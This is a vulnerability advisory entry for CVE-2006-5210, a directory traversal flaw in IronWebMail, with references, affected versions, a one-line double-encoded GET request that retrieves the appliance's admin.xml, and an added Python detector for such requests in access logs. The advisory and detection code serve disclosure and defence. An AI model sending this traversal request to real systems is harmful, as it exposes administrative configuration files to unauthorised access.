IronWebMail HTTP Request Directory Traversal Information Disclosure Vulnerability

Vulnerability ID: 1111299    Vulnerability type: Path traversal
Published: 2006-10-16    Updated: 2006-10-16
CVE ID: CVE-2006-5210    CNNVD-ID: CNNVD-200610-217
Platform: PHP    CVSS score: 5.0
|Vulnerability source
https://www.exploit-db.com/exploits/28778
https://www.securityfocus.com/bid/20436
https://cxsecurity.com/issue/WLB-2006100090
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200610-217
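|Vulnerability details
IronWebMail is an enterprise-grade hardware firewall appliance. IronWebMail has a directory traversal vulnerability in its handling of malformed HTTP requests: a remote attacker can exploit it to access arbitrary files on the appliance by embedding encoded directory traversal sequences in the URL.
|Exploit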
source: http://www.securityfocus.com/bid/20436/info

IronWebMail is prone to a remote information-disclosure vulnerability because the application fails to properly sanitize user-supplied input.

Exploiting this issue allows remote, unauthenticated attackers to retrieve the contents of arbitrary files from vulnerable computers with the privileges of the webserver process. Information harvested may aid in further attacks.

IronWebMail versions prior to 6.1.1 HotFix-17 are affected by this vulnerability.

GET /IM_FILE(%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/admin.xml) HTTP/1.0[CRLF][CRLF]
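
The detection side of the request above, as an added example that is not part of the original advisory: the traversal sequence is percent-encoded twice (`%252e` decodes to `%2e`, then to `.`), so a filter that decodes once never sees `..`. The function names, the decode-depth limit and the access-log format are assumptions, and the sample log lines are constructed.

```python
import re
from urllib.parse import unquote

# A ".." path segment bounded by "/", "\", "(", ")" or the string edges.
DOTDOT = re.compile(r"(?:^|[/\\(])\.\.(?:[/\\)]|$)")
MAX_ROUNDS = 4  # assumption: decode depth worth inspecting


def traversal_depth(target: str, max_rounds: int = MAX_ROUNDS):
    """Return how many percent-decoding passes expose a '..' segment.

    0 = literal '../', 1 = '%2e%2e/', 2 = '%252e%252e/' (the form in the
    advisory), None = no traversal segment found within max_rounds.
    """
    current = target
    for depth in range(max_rounds + 1):
        if DOTDOT.search(current):
            return depth
        decoded = unquote(current)
        if decoded == current:      # fully decoded, nothing left to unwrap
            return None
        current = decoded
    return None


def scan_access_log(lines):
    """Return (line_no, depth, target) for request lines hiding a traversal."""
    request = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
    hits = []
    for n, line in enumerate(lines, 1):
        m = request.search(line)
        if m:
            depth = traversal_depth(m.group(1))
            if depth is not None:
                hits.append((n, depth, m.group(1)))
    return hits


# Constructed sample lines (192.0.2.x is a documentation address range).
SAMPLE_LOG = [
    '192.0.2.10 - - [16/Oct/2006:10:00:01 +0000] "GET /index.html HTTP/1.0" 200 512',
    '192.0.2.11 - - [16/Oct/2006:10:00:02 +0000] "GET /IM_FILE(%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/admin.xml) HTTP/1.0" 200 904',
    '192.0.2.12 - - [16/Oct/2006:10:00:03 +0000] "GET /docs/v1..2/notes.txt HTTP/1.0" 200 77',
    '192.0.2.13 - - [16/Oct/2006:10:00:04 +0000] "GET /a/%2e%2e%2fb HTTP/1.0" 404 0',
]

if __name__ == "__main__":
    for n, depth, target in scan_access_log(SAMPLE_LOG):
        print(f"line {n}: traversal after {depth} decode pass(es): {target}")
```

A depth of 2 or more is the useful signal here: ordinary clients have no reason to double-encode a dot, so such requests merit review even when the server answered with an error.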
|Affected products
CipherTrust IronMail 6.1.1, CipherTrust IronMail 5.0.1, CipherTrust IronMail 4.5.1, CipherTrust IronMail 4.1, CipherTrust IronMail 6.0, CipherTrust IronMail 5.0
|References

Source: BID
Name: 20436
Link: http://www.securityfocus.com/bid/20436
Source: BUGTRAQ
Name: 20061013 SYMSA-2006-010: Directory Traversal in IronWebMail
Link: http://www.securityfocus.com/archive/1/archive/1/448779/100/0/threaded
Source: MISC
Link: https://supportcenter.ciphertrust.com/vulnerability/IWM501-01.html
Source: MISC
Link: http://www.symantec.com/enterprise/research/SYMSA-2006-010.txt
Source: XF
Name: ironwebmail-url-directory-traversal(29620)
Link: http://xforce.iss.net/xforce/xfdb/29620
Source: VUPEN
Name: ADV-2006-4055
Link: http://www.frsirt.com/english/advisories/2006/4055
Source: SECTRACK
Name: 1017069
Link: http://securitytracker.com/id?1017069
Source: SREASON
Name: 1726
Link: http://securityreason.com/securityalert/1726
Source: SECUNIA
Name: 22406
Link: http://secunia.com/advisories/22406